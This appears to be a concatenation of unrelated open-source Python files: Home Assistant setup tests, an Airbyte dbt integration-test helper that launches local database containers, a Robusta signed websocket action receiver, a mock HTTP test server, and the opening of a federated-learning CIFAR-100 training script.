},
'platform_conf 2': {
'platform': 'whatever',
'invalid': True
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 2
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(0):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'not_existing',
'hello': 'world',
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': [{
'platform': 'whatever',
'hello': 'world',
}]
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
# Any falsey platform config will be ignored (None, {}, etc)
with assert_setup_component(0) as config:
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': None
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {}
})
assert 'platform_conf' in self.hass.config.components
assert not config['platform_conf'] # empty
def test_validate_platform_config_2(self, caplog):
"""Test component PLATFORM_SCHEMA_BASE prio over PLATFORM_SCHEMA."""
platform_schema = PLATFORM_SCHEMA.extend({
'hello': str,
})
platform_schema_base = PLATFORM_SCHEMA_BASE.extend({
'hello': 'world',
})
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema=platform_schema,
platform_schema_base=platform_schema_base))
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform('whatever',
platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
# fail: no extra keys allowed in platform schema
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
'invalid': 'extra',
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 1
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
# pass
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
# fail: key hello violates component platform_schema_base
'platform_conf 2': {
'platform': 'whatever',
'hello': 'there'
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
def test_validate_platform_config_3(self, caplog):
"""Test fallback to component PLATFORM_SCHEMA."""
component_schema = PLATFORM_SCHEMA_BASE.extend({
'hello': str,
})
platform_schema = PLATFORM_SCHEMA.extend({
'cheers': str,
'hello': 'world',
})
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema=component_schema))
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform('whatever',
platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
'invalid': 'extra',
}
})
assert caplog.text.count('Your configuration contains '
'extra keys') == 1
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
# pass
'platform_conf': {
'platform': 'whatever',
'hello': 'world',
},
# fail: key hello violates component platform_schema
'platform_conf 2': {
'platform': 'whatever',
'hello': 'there'
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
def test_validate_platform_config_4(self):
"""Test entity_namespace in PLATFORM_SCHEMA."""
component_schema = PLATFORM_SCHEMA_BASE
platform_schema = PLATFORM_SCHEMA
mock_integration(
self.hass,
MockModule('platform_conf',
platform_schema_base=component_schema))
mock_entity_platform(
self.hass,
'platform_conf.whatever',
MockPlatform(platform_schema=platform_schema))
with assert_setup_component(1):
assert setup.setup_component(self.hass, 'platform_conf', {
'platform_conf': {
# pass: entity_namespace accepted by PLATFORM_SCHEMA
'platform': 'whatever',
'entity_namespace': 'yummy',
}
})
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('platform_conf')
def test_component_not_found(self):
"""setup_component should not crash if component doesn't exist."""
assert setup.setup_component(self.hass, 'non_existing') is False
def test_component_not_double_initialized(self):
"""Test we do not set up a component twice."""
mock_setup = mock.MagicMock(return_value=True)
mock_integration(
self.hass,
MockModule('comp', setup=mock_setup))
assert setup.setup_component(self.hass, 'comp')
assert mock_setup.called
mock_setup.reset_mock()
assert setup.setup_component(self.hass, 'comp')
assert not mock_setup.called
@mock.patch('homeassistant.util.package.install_package',
return_value=False)
def test_component_not_installed_if_requirement_fails(self, mock_install):
"""Component setup should fail if requirement can't install."""
self.hass.config.skip_pip = False
mock_integration(
self.hass,
MockModule('comp', requirements=['package==0.0.1']))
assert not setup.setup_component(self.hass, 'comp')
assert 'comp' not in self.hass.config.components
def test_component_not_setup_twice_if_loaded_during_other_setup(self):
"""Test component setup while waiting for lock is not set up twice."""
result = []
@asyncio.coroutine
def async_setup(hass, config):
"""Tracking Setup."""
result.append(1)
mock_integration(
self.hass,
MockModule('comp', async_setup=async_setup))
def setup_component():
"""Set up the component."""
setup.setup_component(self.hass, 'comp')
thread = threading.Thread(target=setup_component)
thread.start()
setup.setup_component(self.hass, 'comp')
thread.join()
assert len(result) == 1
def test_component_not_setup_missing_dependencies(self):
"""Test we do not set up a component if not all dependencies loaded."""
deps = ['maybe_existing']
mock_integration(self.hass, MockModule('comp', dependencies=deps))
assert not setup.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(self.hass, MockModule('comp2', dependencies=deps))
mock_integration(self.hass, MockModule('maybe_existing'))
assert setup.setup_component(self.hass, 'comp2', {})
def test_component_failing_setup(self):
"""Test component that fails setup."""
mock_integration(
self.hass,
MockModule('comp', setup=lambda hass, config: False))
assert not setup.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_exception_setup(self):
"""Test component that raises exception during setup."""
def exception_setup(hass, config):
"""Raise exception."""
raise Exception('fail!')
mock_integration(self.hass,
MockModule('comp', setup=exception_setup))
assert not setup.setup_component(self.hass, 'comp', {})
assert 'comp' not in self.hass.config.components
def test_component_setup_with_validation_and_dependency(self):
"""Test all config is passed to dependencies."""
def config_check_setup(hass, config):
"""Test that config is passed in."""
if config.get('comp_a', {}).get('valid', False):
return True
raise Exception('Config not passed in: {}'.format(config))
platform = MockPlatform()
mock_integration(self.hass,
MockModule('comp_a', setup=config_check_setup))
mock_integration(
self.hass,
MockModule('platform_a',
setup=config_check_setup,
dependencies=['comp_a']),
)
mock_entity_platform(self.hass, 'switch.platform_a', platform)
setup.setup_component(self.hass, 'switch', {
'comp_a': {
'valid': True
},
'switch': {
'platform': 'platform_a',
}
})
assert 'comp_a' in self.hass.config.components
def test_platform_specific_config_validation(self):
"""Test platform that specifies config."""
platform_schema = PLATFORM_SCHEMA.extend({
'valid': True,
}, extra=vol.PREVENT_EXTRA)
mock_setup = mock.MagicMock(spec_set=True)
mock_entity_platform(
self.hass,
'switch.platform_a',
MockPlatform(platform_schema=platform_schema,
setup_platform=mock_setup))
with assert_setup_component(0, 'switch'):
assert setup.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'invalid': True
}
})
assert mock_setup.call_count == 0
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('switch')
with assert_setup_component(0):
assert setup.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True,
'invalid_extra': True,
}
})
assert mock_setup.call_count == 0
self.hass.data.pop(setup.DATA_SETUP)
self.hass.config.components.remove('switch')
with assert_setup_component(1, 'switch'):
assert setup.setup_component(self.hass, 'switch', {
'switch': {
'platform': 'platform_a',
'valid': True
}
})
assert mock_setup.call_count == 1
def test_disable_component_if_invalid_return(self):
"""Test disabling component if invalid return."""
mock_integration(
self.hass,
MockModule('disabled_component', setup=lambda hass, config: None))
assert not setup.setup_component(self.hass, 'disabled_component')
assert loader.get_component(self.hass, 'disabled_component') is None
assert 'disabled_component' not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(
self.hass,
MockModule('disabled_component', setup=lambda hass, config: False))
assert not setup.setup_component(self.hass, 'disabled_component')
assert loader.get_component(
self.hass, 'disabled_component') is not None
assert 'disabled_component' not in self.hass.config.components
self.hass.data.pop(setup.DATA_SETUP)
mock_integration(
self.hass,
MockModule('disabled_component', setup=lambda hass, config: True))
assert setup.setup_component(self.hass, 'disabled_component')
assert loader.get_component(
self.hass, 'disabled_component') is not None
assert 'disabled_component' in self.hass.config.components
def test_all_work_done_before_start(self):
"""Test all init work done till start."""
call_order = []
def component1_setup(hass, config):
"""Set up mock component."""
discovery.discover(hass, 'test_component2',
component='test_component2')
discovery.discover(hass, 'test_component3',
component='test_component3')
return True
def component_track_setup(hass, config):
"""Set up mock component."""
call_order.append(1)
return True
mock_integration(
self.hass,
MockModule('test_component1', setup=component1_setup))
mock_integration(
self.hass,
MockModule('test_component2', setup=component_track_setup))
mock_integration(
self.hass,
MockModule('test_component3', setup=component_track_setup))
@callback
def track_start(event):
"""Track start event."""
call_order.append(2)
self.hass.bus.listen_once(EVENT_HOMEASSISTANT_START, track_start)
self.hass.add_job(setup.async_setup_component(
self.hass, 'test_component1', {}))
self.hass.block_till_done()
self.hass.start()
assert call_order == [1, 1, 2]
@asyncio.coroutine
def test_component_cannot_depend_config(hass):
"""Test config is not allowed to be a dependency."""
result = yield from setup._async_process_dependencies(
hass, None, 'test', ['config'])
assert not result
@asyncio.coroutine
def test_component_warn_slow_setup(hass):
"""Warn we log when a component setup takes a long time."""
mock_integration(hass, MockModule('test_component1'))
with mock.patch.object(hass.loop, 'call_later', mock.MagicMock()) \
as mock_call:
result = yield from setup.async_setup_component(
hass, 'test_component1', {})
assert result
assert mock_call.called
assert len(mock_call.mock_calls) == 3
timeout, logger_method = mock_call.mock_calls[0][1][:2]
assert timeout == setup.SLOW_SETUP_WARNING
assert logger_method == setup._LOGGER.warning
assert mock_call().cancel.called
@asyncio.coroutine
def test_platform_no_warn_slow(hass):
"""Do not warn for long entity setup time."""
mock_integration(
hass,
MockModule('test_component1', platform_schema=PLATFORM_SCHEMA))
with mock.patch.object(hass.loop, 'call_later', mock.MagicMock()) \
as mock_call:
result = yield from setup.async_setup_component(
hass, 'test_component1', {})
assert result
assert not mock_call.called
async def test_when_setup_already_loaded(hass):
"""Test when setup."""
calls = []
async def mock_callback(hass, component):
"""Mock callback."""
calls.append(component)
setup.async_when_setup(hass, 'test', mock_callback)
await hass.async_block_till_done()
assert calls == []
hass.config.components.add('test')
hass.bus.async_fire(EVENT_COMPONENT_LOADED, {
'component': 'test'
})
await hass.async_block_till_done()
assert calls == ['test']
# Event listener should be gone
hass.bus.async_fire(EVENT_COMPONENT_LOADED, {
'component': 'test'
})
await hass.async_block_till_done()
assert calls == ['test']
# Should be called right away
setup.async_when_setup(hass, 'test', mock_callback)
await hass.async_block_till_done()
assert calls == ['test', 'test']
|
dbt_integration_test.py
|
#
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
import os
import random
import re
import shutil
import socket
import string
import subprocess
import sys
import threading
import time
from typing import Any, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_config.transform import TransformConfig
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = ["postgres", "mysql"]
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def setup_db(self):
self.setup_postgres_db()
self.setup_mysql_db()
def setup_postgres_db(self):
print("Starting localhost postgres container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"postgres",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
print("Starting localhost mysql container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
Find an unused port to create a database listening on localhost to run destination-postgres
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_profile_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
"""
Each destination requires different settings to connect to. This step generates the adequate profiles.yml
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
else:
profiles_config["schema"] = self.target_schema
profiles_yaml = config_generator.transform(destination_type, profiles_config)
config_generator.write_yaml_config(test_root_dir, profiles_yaml)
return profiles_config
@staticmethod
def run_destination_process(message_file: str, test_root_dir: str, commands: List[str]):
print("Executing: ", " ".join(commands))
with open(os.path.join(test_root_dir, "destination_output.log"), "ab") as f:
process = subprocess.Popen(commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def writer():
if os.path.exists(message_file):
with open(message_file, "rb") as input_data:
while True:
line = input_data.readline()
if not line:
break
process.stdin.write(line)
process.stdin.close()
thread = threading.Thread(target=writer)
thread.start()
for line in iter(process.stdout.readline, b""):
f.write(line)
sys.stdout.write(line.decode("utf-8"))
thread.join()
process.wait()
return process.returncode == 0
def dbt_run(self, test_root_dir: str):
"""
Run the dbt CLI to perform transformations on the test raw data in the destination
"""
# Perform sanity check on dbt project settings
assert self.run_check_dbt_command("debug", test_root_dir)
assert self.run_check_dbt_command("deps", test_root_dir)
final_sql_files = os.path.join(test_root_dir, "final")
shutil.rmtree(final_sql_files, ignore_errors=True)
# Compile dbt models files into destination sql dialect, then run the transformation queries
assert self.run_check_dbt_command("run", test_root_dir)
@staticmethod
def run_check_dbt_command(command: str, cwd: str) -> bool:
"""
Run dbt subprocess while checking and counting for "ERROR", "FAIL" or "WARNING" printed in its outputs
"""
error_count = 0
commands = [
"docker",
"run",
"--rm",
"--init",
"-v",
f"{cwd}:/workspace",
"-v",
f"{cwd}/build:/build",
"-v",
f"{cwd}/final:/build/run/airbyte_utils/models/generated",
"-v",
"/tmp:/tmp",
"--network",
"host",
"--entrypoint",
"/usr/local/bin/dbt",
"-i",
"airbyte/normalization:dev",
command,
"--profiles-dir=/workspace",
"--project-dir=/workspace",
]
print("Executing: ", " ".join(commands))
print(f"Equivalent to: dbt {command} --profiles-dir={cwd} --project-dir={cwd}")
with open(os.path.join(cwd, "dbt_output.log"), "ab") as f:
process = subprocess.Popen(commands, cwd=cwd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=os.environ)
for line in iter(lambda: process.stdout.readline(), b""):
f.write(line)
str_line = line.decode("utf-8")
sys.stdout.write(str_line)
# keywords to match lines as signaling errors
if "ERROR" in str_line or "FAIL" in str_line or "WARNING" in str_line:
# exception keywords in lines to ignore as errors (such as summary or expected warnings)
is_exception = False
for except_clause in [
"Done.", # DBT Summary
"PASS=", # DBT Summary
"Nothing to do.", # When no schema/data tests are setup
"Configuration paths exist in your dbt_project.yml", # When no cte / view are generated
"Error loading config file: .dockercfg: $HOME is not defined", # ignore warning
]:
if except_clause in str_line:
is_exception = True
break
if not is_exception:
# count lines signaling an error/failure/warning
error_count += 1
process.wait()
message = (
f"{' '.join(commands)}\n\tterminated with return code {process.returncode} "
f"with {error_count} 'Error/Warning/Fail' mention(s)."
)
print(message)
assert error_count == 0, message
assert process.returncode == 0, message
if error_count > 0:
return False
return process.returncode == 0
@staticmethod
def copy_replace(src, dst, pattern=None, replace_value=None):
"""
Copies a file from src to dst replacing pattern by replace_value
Parameters
----------
src : string
Path to the source filename to copy from
dst : string
Path to the output filename to copy to
pattern
list of Patterns to replace inside the src file
replace_value
list of Values to replace by in the dst file
"""
file1 = open(src, "r") if isinstance(src, str) else src
file2 = open(dst, "w") if isinstance(dst, str) else dst
pattern = [pattern] if isinstance(pattern, str) else pattern
replace_value = [replace_value] if isinstance(replace_value, str) else replace_value
if replace_value and pattern:
if len(replace_value) != len(pattern):
raise Exception("Invalid parameters: pattern and replace_value" " have different sizes.")
rules = [(re.compile(regex, re.IGNORECASE), value) for regex, value in zip(pattern, replace_value)]
else:
rules = []
for line in file1:
if rules:
for rule in rules:
line = re.sub(rule[0], rule[1], line)
file2.write(line)
if isinstance(src, str):
file1.close()
if isinstance(dst, str):
file2.close()
|
receiver.py
|
import hmac
import logging
import time
import traceback
import websocket
import json
import os
from threading import Thread
from pydantic import BaseModel
from ..core.playbooks.playbooks_event_handler import PlaybooksEventHandler
from ..core.model.env_vars import INCOMING_REQUEST_TIME_WINDOW_SECONDS, RUNNER_VERSION
from robusta.core.reporting.action_requests import (
ExternalActionRequest,
ActionRequestBody,
sign_action_request,
)
WEBSOCKET_RELAY_ADDRESS = os.environ.get(
"WEBSOCKET_RELAY_ADDRESS", "wss://relay.robusta.dev"
)
CLOUD_ROUTING = json.loads(os.environ.get("CLOUD_ROUTING", "True").lower())
RECEIVER_ENABLE_WEBSOCKET_TRACING = json.loads(
os.environ.get("RECEIVER_ENABLE_WEBSOCKET_TRACING", "False").lower()
)
INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC = int(
os.environ.get("INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC", 3)
)
class ActionRequestReceiver:
def __init__(self, event_handler: PlaybooksEventHandler):
self.event_handler = event_handler
self.active = True
self.account_id = self.event_handler.get_global_config().get("account_id")
self.cluster_name = self.event_handler.get_global_config().get("cluster_name")
self.ws = websocket.WebSocketApp(
WEBSOCKET_RELAY_ADDRESS,
on_open=self.on_open,
on_message=self.on_message,
on_error=self.on_error,
)
if not self.account_id or not self.cluster_name:
logging.error(
f"Action receiver cannot start. "
f"Missing required account_id {self.account_id} cluster_name {self.cluster_name}"
)
return
self.start_receiver()
def start_receiver(self):
if not CLOUD_ROUTING:
logging.info(
"outgoing messages only mode. Incoming event receiver not initialized"
)
return
if WEBSOCKET_RELAY_ADDRESS == "":
logging.warning("relay address empty. Not initializing relay")
return
websocket.enableTrace(RECEIVER_ENABLE_WEBSOCKET_TRACING)
receiver_thread = Thread(target=self.run_forever)
receiver_thread.start()
def __run_external_action_request(self, request: ActionRequestBody):
logging.info(f"got callback `{request.action_name}` {request.action_params}")
self.event_handler.run_external_action(
request.action_name,
request.action_params,
request.sinks,
)
def run_forever(self):
logging.info("starting relay receiver")
while self.active:
self.ws.run_forever()
logging.info("relay websocket closed")
time.sleep(INCOMING_WEBSOCKET_RECONNECT_DELAY_SEC)
def stop(self):
logging.info(f"Stopping incoming receiver")
self.active = False
self.ws.close()
def __exec_external_request(
self, action_request: ExternalActionRequest, validate_timestamp: bool
):
if validate_timestamp and (
time.time() - action_request.body.timestamp
> INCOMING_REQUEST_TIME_WINDOW_SECONDS
):
logging.error(
f"Rejecting incoming request because it's too old. Cannot verify request {action_request}"
)
return
if not self.__validate_request(action_request.body, action_request.signature):
logging.error(f"Failed to validate action request {action_request}")
return
self.__run_external_action_request(action_request.body)
def on_message(self, ws, message):
# TODO: use typed pydantic classes here?
logging.debug(f"received incoming message {message}")
incoming_event = json.loads(message)
actions = incoming_event.get("actions", None)
if actions: # this is slack callback format
# slack callbacks have a list of 'actions'. Within each action there a 'value' field,
# which container the actual action details we need to run.
# This wrapper format is part of the slack API, and cannot be changed by us.
for action in actions:
try:
self.__exec_external_request(
ExternalActionRequest.parse_raw(action["value"]), False
)
except Exception:
logging.error(
f"Failed to run incoming event {incoming_event}", exc_info=True
)
else: # assume it's ActionRequest format
try:
self.__exec_external_request(
ExternalActionRequest(**incoming_event), True
)
except Exception:
logging.error(
f"Failed to run incoming event {incoming_event}", exc_info=True
)
def on_error(self, ws, error):
logging.info(f"Relay websocket error: {error}")
def on_open(self, ws):
account_id = self.event_handler.get_global_config().get("account_id")
cluster_name = self.event_handler.get_global_config().get("cluster_name")
open_payload = {
"action": "auth",
"account_id": account_id,
"cluster_name": cluster_name,
"version": RUNNER_VERSION,
}
logging.info(
f"connecting to server as account_id={account_id}; cluster_name={cluster_name}"
)
ws.send(json.dumps(open_payload))
def __validate_request(self, body: BaseModel, signature: str) -> bool:
signing_key = self.event_handler.get_global_config().get("signing_key")
if not signing_key:
logging.error(f"Signing key not available. Cannot verify request {body}")
return False
generated_signature = sign_action_request(body, signing_key)
return hmac.compare_digest(generated_signature, signature)
|
mock_server.py
|
# Copyright 2018 Cable Television Laboratories, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Standard library imports...
from BaseHTTPServer import BaseHTTPRequestHandler
import socket
import json
# Third-party imports...
import requests
from threading import Thread
from BaseHTTPServer import HTTPServer
class MockServerRequestHandler(BaseHTTPRequestHandler):
@classmethod
def setup_class(cls):
# Configure mock server.
cls.mock_server_port = get_free_port()
cls.mock_server = HTTPServer(('localhost', cls.mock_server_port),
MockServerRequestHandler)
# Start running mock server in a separate thread.
# Daemon threads automatically shut down when the main process exits.
cls.mock_server_thread = Thread(target=cls.mock_server.serve_forever)
cls.mock_server_thread.setDaemon(True)
cls.mock_server_thread.start()
def do_GET(self):
# Process GET request, return a response with an HTTP 200
# status.
if self.headers.get('Authorization') is not None:
data = {'Token': '123'}
data = json.dumps(data).encode('utf-8')
self.send_response(requests.codes.ok)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(data)
return True
else:
self.send_response(requests.codes.ok)
self.end_headers()
return
def do_POST(self):
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
self.send_response(requests.codes.created)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(post_body)
return True
def do_PUT(self):
content_len = int(self.headers.getheader('content-length', 0))
post_body = self.rfile.read(content_len)
self.send_response(requests.codes.ok)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(post_body)
return True
def do_DELETE(self):
data = {'Deleted': '123'}
data = json.dumps(data).encode('utf-8')
self.send_response(requests.codes.ok)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.wfile.write(data)
return True
def get_free_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(('localhost', 0))
address, port = s.getsockname()
s.close()
return port
|
federated_learning_keras_consensus_FL_threads_CIFAR100_gradients_exchange.py
|
from DataSets import CIFARData
from DataSets_task import CIFARData_task
from consensus.consensus_v4 import CFA_process
from consensus.parameter_server_v2 import Parameter_Server
# use only for consensus , PS only for energy efficiency
# from ReplayMemory import ReplayMemory
import numpy as np
import os
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
from tensorflow.keras import models
import argparse
import warnings
import glob
import datetime
import scipy.io as sio
# import multiprocessing
import threading
import math
from matplotlib.pyplot import pause
import time
warnings.filterwarnings("ignore")
parser = argparse.ArgumentParser()
parser.add_argument('-resume', default=0, help="set 1 to resume from a previous simulation, 0 to start from the beginning", type=float)
parser.add_argument('-PS', default=0, help="set 1 to enable PS server and FedAvg, set 0 to disable PS", type=float)
parser.add_argument('-consensus', default=1, help="set 1 to enable consensus, set 0 to disable", type=float)
parser.add_argument('-mu', default=0.01, help="sets the learning rate for all setups", type=float)
parser.add_argument('-mu2', default=0.01, help="sets the gradient update rate", type=float)
parser.add_argument('-eps', default=0.5, help="sets the mixing parameters for model averaging (CFA)", type=float)
parser.add_argument('-eps_grads', default=0.5, help="sets the mixing parameters for gradient combining (CFA-GE)", type=float)
parser.add_argument('-target', default=0.1, help="sets the target loss to stop federation", type=float)
parser.add_argument('-K', default=30, help="sets the number of network devices", type=int)
parser.add_argument('-Ka', default=20, help="sets the number of active devices per round in FA (<= K)", type=int)
parser.add_argument('-N', default=1, help="sets the max. number of neighbors per device per round in CFA", type=int)
parser.add_argument('-Ka_consensus', default=30, help="sets the number of active devices for consensus", type=int)
parser.add_argument('-samp', default=500, help="sets the number samples per device", type=int)
parser.add_argument('-noniid_assignment', default=1, help=" set 0 for iid assignment, 1 for non-iid random", type=int)
parser.add_argument('-gradients', default=1, help=" set 0 to disable gradient exchange, 1 to enable", type=int)
parser.add_argument('-run', default=0, help=" set the run id", type=int)
parser.add_argument('-random_data_distribution', default=0, help=" set 0 for fixed distribution, 1 for time-varying", type=int)
parser.add_argument('-batches', default=5, help="sets the number of batches per learning round", type=int)
parser.add_argument('-batch_size', default=100, help="sets the batch size per learning round", type=int)
parser.add_argument('-graph', default=6, help="sets the input graph: 0 for default graph, >0 uses the input graph in vGraph.mat, and choose one graph from the available adjacency matrices", type=int)
parser.add_argument('-modelselection', default=0, help="sets the model: 0 for lenet-1", type=int)
args = parser.parse_args()
devices = args.K # NUMBER OF DEVICES
active_devices_per_round = args.Ka
max_epochs = 1000
validation_train = 50000 # VALIDATION and training DATASET size
validation_test = 10000
condition = args.modelselection
n_outputs = 100
optimizer = keras.optimizers.Adam(learning_rate=args.mu, clipnorm=1.0)
# optimizer = keras.optimizers.SGD(learning_rate=args.mu, momentum=0.9)
condition = args.modelselection
if args.consensus == 1:
federated = True
parameter_server = False
elif args.PS == 1:
federated = False
parameter_server = True
else: # CL: CENTRALIZED LEARNING ON DEVICE 0 (DATA CENTER)
federated = False
parameter_server = False
################# consensus, create the scheduling function ################
scheduling_tx = np.zeros((devices, max_epochs*2), dtype=int)
if parameter_server and not federated:
indexes_tx = np.zeros((args.Ka, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka, replace=False)
sr = devices - args.Ka + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:,k] = inds
elif not parameter_server and federated:
indexes_tx = np.zeros((args.Ka_consensus, max_epochs*2), dtype=int)
for k in range(max_epochs*2):
# inds = np.random.choice(devices, args.Ka_consensus, replace=False)
sr = devices - args.Ka_consensus + 1
sr2 = k % sr
inds = np.arange(sr2, args.Ka_consensus + sr2)
scheduling_tx[inds, k] = 1
indexes_tx[:, k] = inds
###########################################################################
if active_devices_per_round > devices:
active_devices_per_round = devices
target_loss = args.target
# Configuration paramaters for the whole setup
seed = 42
# batch_size = 5 # Size of batch taken from replay buffer
batch_size = args.batch_size
number_of_batches = args.batches
training_set_per_device = args.samp # NUMBER OF TRAINING SAMPLES PER DEVICE
if (training_set_per_device > validation_train/args.K):
training_set_per_device = math.floor(validation_train/args.K)
print(training_set_per_device)
if batch_size > training_set_per_device:
batch_size = training_set_per_device
# if batch_size*number_of_batches > training_set_per_device:
# number_of_batches = math.floor(training_set_per_device/batch_size)
# number_of_batches = int(training_set_per_device/batch_size)
